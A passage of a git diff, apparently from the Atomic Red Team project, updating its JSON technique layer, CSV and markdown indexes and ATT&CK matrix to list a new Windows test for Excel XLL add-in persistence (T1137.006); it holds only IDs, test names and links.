blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco
/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.co
m/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":tru
e,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":
100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1
555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID
":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techni
queID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"t
echniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1
574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index ac4e52f7..45bbdc86 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -511,6 +511,7 @@ persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934
 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
 persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
 persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
+persistence,T1137.006,Add-ins,1,Code Executed Via Excel Add-in File (Xll),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
 persistence,T1098.001,Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
 persistence,T1098.001,Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
 persistence,T1098.001,Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index dd997f91..a1f784a4 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -348,6 +348,7 @@ persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debu
 persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
 persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
+persistence,T1137.006,Add-ins,1,Code Executed Via Excel Add-in File (Xll),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
 persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
 persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
 persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index ec343760..44a94f8d 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -868,7 +868,8 @@ - Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws] - T1547.014 Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1137.006 Add-ins](../../T1137.006/T1137.006.md) + - Atomic Test #1: Code Executed Via Excel Add-in File (Xll) [windows] - [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md) - Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad] - Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 1baed247..97ec109c 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -622,7 +622,8 @@ - Atomic Test #1: Admin Account Manipulate [windows] - Atomic Test #2: Domain Account and Group Manipulate [windows] - T1547.014 Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1137.006 Add-ins](../../T1137.006/T1137.006.md) + - Atomic Test #1: Code Executed Via Excel Add-in File (Xll) [windows] - T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md) - Atomic Test #1: Install AppInit Shim [windows] diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index 0c747127..2cd550c4 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md 
@@ -5,7 +5,7 @@ | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | -| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) | +| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Add-ins](../../T1137.006/T1137.006.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | 
Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) | | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer 